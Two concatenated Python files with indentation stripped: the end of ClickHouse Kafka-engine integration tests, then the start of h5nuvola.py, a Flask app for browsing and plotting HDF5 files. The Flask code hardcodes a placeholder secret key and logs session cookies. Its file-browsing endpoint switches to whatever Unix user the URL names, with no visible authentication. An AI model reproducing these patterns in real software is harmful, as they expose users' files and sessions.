instance.query('DROP TABLE IF EXISTS test.kafka_consumer{}'.format(consumer_index))
while int(instance.query(
"SELECT count() FROM system.tables WHERE database='test' AND name='kafka_consumer{}'".format(
consumer_index))) == 1:
time.sleep(1)
# print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
print(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
print((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
print(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(1200)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(1)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
SELECT * FROM test.kafka LIMIT 1; /* do subscription & assignment in advance (it can take different time, test rely on timing, so can flap otherwise) */
''')
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(1);
''')
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# so i use sleepEachRow
time.sleep(3)
pm.drop_instance_zk_connections(instance)
time.sleep(20)
pm.heal_all()
# connection restored and it will take a while until next block will be flushed
# it takes years on CI :\
time.sleep(45)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("ZooKeeper session has been expired.: while write prefix to view")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) == 0:
print("Waiting for test.kafka_consumer to start consume")
time.sleep(1)
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
time.sleep(1)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(12)
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000;
''')
cancel.set()
time.sleep(15)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
print(result)
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
@pytest.mark.timeout(120)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(300)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(1)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
SELECT * FROM test.kafka LIMIT 1; /* do subscription & assignment in advance (it can take different time, test rely on timing, so can flap otherwise) */
''')
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.5);
''')
# print time.strftime("%m/%d/%Y %H:%M:%S")
time.sleep(3) # MV will work for 10 sec, after that commit should happen, we want to pause before
# print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.pause_container('kafka1')
# that timeout it VERY important, and picked after lot of experiments
# when too low (<30sec) librdkafka will not report any timeout (alternative is to decrease the default session timeouts for librdkafka)
# when too high (>50sec) broker will decide to remove us from the consumer group, and will start answering "Broker: Unknown member"
time.sleep(42)
# print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
# connection restored and it will take a while until next block will be flushed
# it takes years on CI :\
time.sleep(30)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("Local: Waiting for coordinator")
assert instance.contains_in_log("All commit attempts failed")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce('premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
time.sleep(2)
# produce more messages after delay
kafka_produce('premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
time.sleep(6)
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(180)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.query("SELECT * FROM test.kafka")
instance.query("SELECT count() FROM test.destination")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
time.sleep(3)
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
@pytest.mark.timeout(180)
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
h5nuvola.py
|
#!/usr/bin/env python
"""H5 Nuvola - VUO integration
versions:
h5py = 2.7.1
numpy = 1.13.0
json = 2.0.9
flask = 1.0.3
werkzeug = 0.15.4
bokeh = 0.13.0 -> 1.2.0
"""
import re
import requests
import urllib
import webbrowser
import multiprocessing
import os
import pwd
import json
import time
import sys
import hashlib
import ssl
import h5py as h5
import numpy as np
from flask import Flask, request, redirect, url_for, render_template, make_response, Response
from werkzeug.utils import secure_filename
from bokeh.models import ColumnDataSource, HoverTool, CustomJS
from bokeh.plotting import figure
from bokeh.embed import components, json_item
from bokeh.models.widgets import DataTable, DateFormatter, TableColumn, Dropdown, NumberFormatter
from bokeh.colors import RGB
from bokeh.layouts import widgetbox
from bokeh.palettes import Greys
from bokeh.resources import INLINE
from bokeh.core.properties import Dict
##########################################################################
#
# Global variables
#
# Load config file
with open('./h5nuvola.config') as json_config:
config_dict = json.load(json_config)
# VUO lab hash
vlab_hash = str(config_dict.get("vlab_hash"))
# https connection certificates | ssl_context
has_ssl_context = config_dict.get("has_ssl_context")
locations_crt = str(config_dict.get("locations_crt"))
users_nuvola_crt = str(config_dict.get("users_nuvola_crt"))
users_nuvola_key = str(config_dict.get("users_nuvola_key"))
# Flask app.run configuration
host = str(config_dict.get("host"))
port = config_dict.get("port")
debug = config_dict.get("debug")
# jQuery File Tree
fnfilter = lambda fn: True
dfilter = lambda d: True
extension_filter = ['.h5', '.hdf5'] # select desired file extensions to show | '*.*' for all extensions
# h5 files manipulation
hf_dict = {} # dictionary object to store h5 file object, items, attributes and properties
hf_objects = []
##########################################################################
#
# Python auxiliar methods for file browser and h5 files manipulations
#
# Routine for remote file browsing
def get_files_target(d, fnfilter, dfilter, rel, user_name, queue):
fns_dirs_queue = {}
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
d = os.path.expanduser(d)
dirs = []
fns = []
for fn in sorted(os.listdir(d)):
ffn = os.path.join(d, fn)
if not rel:
fn = ffn
if os.path.isdir(ffn):
if dfilter(ffn):
dirs.append(fn)
else:
if fnfilter(ffn):
if extension_filter == ['*.*']:
fns.append(fn)
else:
if os.path.splitext(fn)[1] not in extension_filter:
pass
else:
fns.append(fn)
fns_dirs_queue["fns"] = fns
fns_dirs_queue["dirs"] = dirs
queue.put(fns_dirs_queue)
except Exception as E:
print 'Could not load directory: %s' % str(E)
fns_dirs_queue["exception"] = E
# Read h5 files and retrieve children objects from the root group
def read_h5_target(filepath, user_name, queue):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
hf_dict = {}
hf_dict[filepath] = {}
try:
with h5.File(filepath) as hf:
# collect objects to render on template
hf_name = str(hf.filename).split('/')[-1]
hf_dict[filepath]['hf_name'] = hf_name
hf_objects = []
hf.visititems(hf_visit) # update hf_objects
hf_dict[filepath]['hf_objects'] = hf_objects
root_attrs=[]
if hf.attrs.keys() == []: # if there is no attributes
pass
else:
for key in hf.attrs.keys():
root_attrs.append([key, hf.attrs[key]])
hf_dict[filepath]['root_attrs'] = root_attrs
root_properties = [ hf_name, 'group', root_attrs, True, 'Group size', str(len(hf.items())) ]
hf_dict[filepath]['root_properties'] = root_properties
hf_root_items = get_hf_items(hf.items())
hf_dict[filepath]['hf_root_items'] = hf_root_items
hf_new_items = [[str(0)]]
hf_dict[filepath]['hf_new_items'] = hf_new_items
hf.close()
queue.put(hf_dict) # send content back to father process
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
# Expand h5Tree
def expand_tree_target(user_name, filepath, node_selected, queue):
global hf_objects
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
with h5.File(filepath) as hf:
hf_objects = []
hf.visititems(hf_visit)
for obj in hf_objects:
if str(obj.name) == node_selected:
if len(obj.items()) != 0:
hf_new_items = get_hf_items(obj.items())
else:
hf_new_items = [[str(1)]]
queue.put(hf_new_items) # send content back to parent process
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
# Called by expand_tree_traget
def hf_visit(name, obj):
global hf_objects
hf_objects.append(obj)
# Retrieve attributes, type (group or dataset), children, dtype and dshape from h5 objects
def get_hf_items(items):
l = []
for item in items:
attrs = []
tp = ''
children = None
dtype = ''
dshape = ''
if item[1].attrs.keys() == []: # if there is no attributes
pass
else:
for key in item[1].attrs.keys():
if type(item[1].attrs[key] == type(np.zeros((0,1)))): # if attibute is an array
attrs.append([key, str(item[1].attrs[key])]) # convert attribute to str
else:
attrs.append([key, item[1].attrs[key]])
if type(item[1]) == h5._hl.dataset.Dataset:
if h5.check_dtype(vlen=item[1].dtype) == str:
dtype = 'string'
else:
dtype = str(item[1].dtype)
dshape = str(list(item[1].shape))
tp = 'dataset'
children = False
else:
tp = 'group'
dtype = 'Group size'
dshape = str(len(item[1].items()))
if len(item[1].items()) == 0:
children = False
else:
children = True
l.append( [str(item[1].name), #0
tp, #1
attrs, #2
children, #3
dtype, #4
dshape] ) #5
return l
##########################################################################
#
# Bokeh plotting routines - raw, curve and image
#
def create_bokeh_tools():
bokeh_tools = ["pan","wheel_zoom","box_zoom","reset","save","box_select"]
hover = HoverTool(tooltips=[
("pixel_value", "@image{0.00}"),
("point_value", "$y{0.00}"),
("(x,y)", "($x{0.},$y{0.})"),
])
bokeh_tools.append(hover)
return bokeh_tools
def bokeh_to_json_item(items):
bokeh_json_items = [json_item(item) for item in items]
return bokeh_json_items
def bokeh_table_target(user_name, filepath, dataset_name, queue):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
with h5.File(filepath) as hf:
data = hf[dataset_name][()]
if type(data) == str: # String dataset
table = dict(x=[data])
columns = [
TableColumn( field='x', title='0', width=400, sortable=False )
]
width=400
height=200
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
width=width, height=height,
selectable=True, sortable=False)
# convert bokeh model obj into json_item to be embedded in HTML
bokeh_json_item_tables = bokeh_to_json_item([data_table])
# send data back to parent process through the queue
queue.put(bokeh_json_item_tables)
else:
if data.ndim == 0: # Scalar dataset
table = dict( x=[data] )
columns = [
TableColumn( field='x', title='0', width=100,
sortable=False, formatter=NumberFormatter(format="0,0.0000000000") )
]
width=200
height=200
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
width=width, height=height,
selectable=True, sortable=False)
bokeh_json_item_tables = bokeh_to_json_item([data_table])
queue.put(bokeh_json_item_tables)
elif data.ndim == 1: # 1D dataset
table = dict( x=data.tolist() )
columns = [
TableColumn( field='x', title='0', width=100,
sortable=False, formatter=NumberFormatter(format="0,0.0000000000") )
]
width=200
height=800
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
width=width, height=height,
selectable=True, sortable=False)
bokeh_json_item_tables = bokeh_to_json_item([data_table])
queue.put(bokeh_json_item_tables)
elif data.ndim == 2: # 2D dataset
table = {}
i = 0
columns = []
for column in data.transpose():
table.update({str(i):column})
columns.append( TableColumn( field=str(i), title=str(i), width=100,
sortable=False, formatter=NumberFormatter(format="0,0.0000000000") ) )
i = i + 1
width=800
height=800
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
## width=width, height=height,
selectable=True, sortable=False, editable=False)
bokeh_json_item_tables = bokeh_to_json_item([data_table])
queue.put(bokeh_json_item_tables)
elif data.ndim == 3: # 3D dataset
tables = []
for i in np.arange(0,data.shape[2]):
table = {}
j = 0
columns = []
for column in data[:,:,i].transpose():
table.update({str(j):column})
columns.append( TableColumn( field=str(j), title=str(j), width=100, sortable=False ) )
# print "table i=%d, j=%d"%(i, j)
j = j + 1
width = 800
height = 800
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
width=width, height=height,
selectable=True, sortable=False)
tables.append(data_table)
bokeh_json_item_tables = bokeh_to_json_item(tables)
queue.put(bokeh_json_item_tables)
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
def bokeh_plot_target(user_name, filepath, dataset_name, queue):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
with h5.File(filepath) as hf:
data = hf[dataset_name][()]
if data.ndim == 0:
bokeh_tools = create_bokeh_tools()
y=[data]
x=[0]
source = ColumnDataSource(data=dict(x=x, y=y))
plot = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", tools=bokeh_tools)
plot.line('x', 'y', source=source, legend=dataset_name.split('/')[-1],
line_width=3, line_alpha=0.6, line_color=RGB(0,158,234))
plot.circle('x', 'y', source=source, fill_color="white", size=10)
bokeh_json_item_plots = bokeh_to_json_item([plot])
queue.put(bokeh_json_item_plots)
elif data.ndim == 1:
bokeh_tools = create_bokeh_tools()
y = data
x = np.arange(data.shape[0])
source = ColumnDataSource(data=dict(x=x, y=y))
plot = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", tools=bokeh_tools)
plot.line('x', 'y', source=source, legend=dataset_name.split('/')[-1],
line_width=3, line_alpha=0.6, line_color=RGB(0,158,234))
plot.circle('x', 'y', source=source, fill_color="white", size=10)
bokeh_json_item_plots = bokeh_to_json_item([plot])
queue.put(bokeh_json_item_plots)
elif data.ndim == 2:
plots = []
i = 0
for p in data:
bokeh_tools = create_bokeh_tools()
y = p
x = np.arange(p.shape[0])
source = ColumnDataSource(data=dict(x=x, y=y))
p = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", tools=bokeh_tools)
p.line('x', 'y', source=source, legend=dataset_name.split('/')[-1],
line_width=3, line_alpha=0.6, line_color=RGB(0,158,234))
p.circle('x', 'y', source=source, fill_color="white", size=10)
plots.append(p)
print str(i)
i += 1
bokeh_json_item_plots = bokeh_to_json_item(plots)
queue.put(bokeh_json_item_plots)
elif data.ndim == 3:
print "3D data"
# Try plotly 3D scatter, 3D isosurface,
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
def bokeh_image_target(user_name, filepath, dataset_name, queue):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
with h5.File(filepath) as hf:
data = hf[dataset_name][()]
if data.ndim == 2:
bokeh_tools = create_bokeh_tools()
plot = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", aspect_ratio=1.5, tools=bokeh_tools,
max_height=1200, # height_policy="fit",
max_width=1500, # width_policy="fit",
x_range=(0,data.shape[0]), y_range=(0,data.shape[1]))
plot.image(image=[data], x=0, y=0, dw=data.shape[0], dh=data.shape[1])
bokeh_json_item_images = bokeh_to_json_item([plot])
queue.put(bokeh_json_item_images)
elif data.ndim == 3:
if 1 in data.shape: # one of the dimensions are 1, means it is a 2D image
ind = data.shape.index(1)
if ind == 0:
new_shape = (data.shape[1], data.shape[2])
elif ind == 1:
new_shape = (data.shape[0], data.shape[2])
else:
new_shape = (data.shape[0], data.shape[1])
data = data.reshape(new_shape)
bokeh_tools = create_bokeh_tools()
plot = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", aspect_ratio="auto", height_policy="fit", tools=bokeh_tools,
x_range=(0,data.shape[0]), y_range=(0,data.shape[1]))
plot.image(image=[data], x=0, y=0, dw=data.shape[0], dh=data.shape[1])
bokeh_json_item_images = bokeh_to_json_item([plot])
queue.put(bokeh_json_item_images)
else:
pass
# Embed Plotly in HTML
# https://blog.heptanalytics.com/2018/08/07/flask-plotly-dashboard/
# Try plotly 3D surface, 3D volume
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
##########################################################################
#
# VUO auxiliar functions - vuo id, vlab function call
#
def get_vuo_user(cookie):
vuo_function = 'https://vuo.elettra.eu/pls/vuo/vuo_sso.detail' # PL SQL function
r = requests.get(vuo_function, params={'cookie': cookie , 'what_detail': 'unix'})
response = str(r.text)[:-1] # exclude '\n' at the end of the string
response = response.split(':') # take each field of the response, convert to a list
print(response)
if response[0] == 'OK':
response_dic = {
'status': response[0],
'vuo_user_id': response[1],
'unix_user_name': response[2],
'unix_user_id': response[3],
'unix_group_id': response[4]
}
else:
response_dic = {
'status': response[0],
'redirect_url': ':'.join(response[1:3]).replace('trieste.it', 'eu')
}
return response_dic
def vlab_call(vuo_user_id, investigation_id ):
vlab_hash_digested = hashlib.sha1(vlab_hash + vuo_user_id + investigation_id).hexdigest()
vlab_function = 'https://vuo.elettra.eu/pls/vuo/vlab.sm_get_investigation_info'
r = requests.get(vlab_function, params={'FRM_HASH':vlab_hash_digested,
'FRM_USR_ID':vuo_user_id,
'FRM_INVESTIGATION_ID':investigation_id})
response = str(r.text)[:-1] # exclude '\n' at the end of the string
response = response.split(':')
if response[0] == 'OK':
unix_user_id = response[1].split('/')[0] # rertieve unix_user_id
unix_user_name = pwd.getpwuid(int(unix_user_id)).pw_name # 'name.surname'
h5nuvola_user_name = unix_user_name.replace('.', ' ').title() # 'Name Surname'
base_dir = "/" + "/".join(response[1].split('/')[1::]) # retrieve base dir path to browse
response_dic = {
'status': response[0],
'unix_user_id': unix_user_id,
'unix_user_name': unix_user_name,
'h5nuvola_user_name': h5nuvola_user_name,
'base_dir': base_dir
}
else:
response_dic = {
'status': response[0],
'message': response[1]
}
return response_dic
##########################################################################
#
# Flask app config
#
app = Flask(__name__)
app.secret_key = 'some super secret key here'
##########################################################################
#
# Flask app routes/endpoints - remote browser, h5 visualisation, plotting
#
@app.route('/test')
def test():
return render_template('h5nuvola_web_interface.html')
# VUO vlab link will call this endpoint
@app.route('/h5nuvola/vlab/<investigation_id>')
def vlab_verify(investigation_id):
# Get vuo_session cookie from flask 'request' global context variable
try:
cookies = str(request.headers['Cookie'])
if ";" in cookies: # check if there are more than one cookie set
print "More than one cookie"
print cookies
cookies = cookies.split(';')
print cookies
for cookie in cookies:
if "vuo_session" in cookie:
vuo_session_cookie = cookie.strip().split('=')[-1]
else:
print "Single cookie"
vuo_session_cookie = cookies.split('=')[-1]
response_vuo = get_vuo_user(vuo_session_cookie)
if response_vuo['status'] == 'OK':
print("Valid session on VUO!")
vuo_user_id = response_vuo['vuo_user_id']
response_vlab = vlab_call(vuo_user_id, investigation_id)
if response_vlab['status'] == 'OK':
return render_template("h5nuvola_web_interface.html",
UNIX_USER_NAME=json.dumps(response_vlab['unix_user_name']),
H5NUVOLA_USER_NAME=json.dumps(response_vlab['h5nuvola_user_name']),
BASE_DIR=json.dumps(response_vlab['base_dir']),
INVESTIGATION_ID=json.dumps(investigation_id))
else:
return response_vlab['message'][0:-1] + " to access investigation ID " + investigation_id
else:
print("NOT a valid session on VUO! Please log in.")
print(response_vuo['redirect_url'])
return redirect(response_vuo['redirect_url'] +
urllib.quote('https://users-nuvola.elettra.eu/h5nuvola/vlab/' +
investigation_id))
except KeyError: # Could not find Cookie in the headers
return "Could not verify if user is logged in VUO. Please log in and try again."
# endpoint called every time a folder is clicked in the jQuery FileTree app
@app.route('/sfiles/<unix_user_name>', methods=["GET", "POST"])
def sfiles(unix_user_name):
r = []
d = urllib.unquote(request.form.get('dir', './'))
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=get_files_target,
args=(d,
fnfilter,
dfilter,
True,
unix_user_name,
queue)
)
p.start()
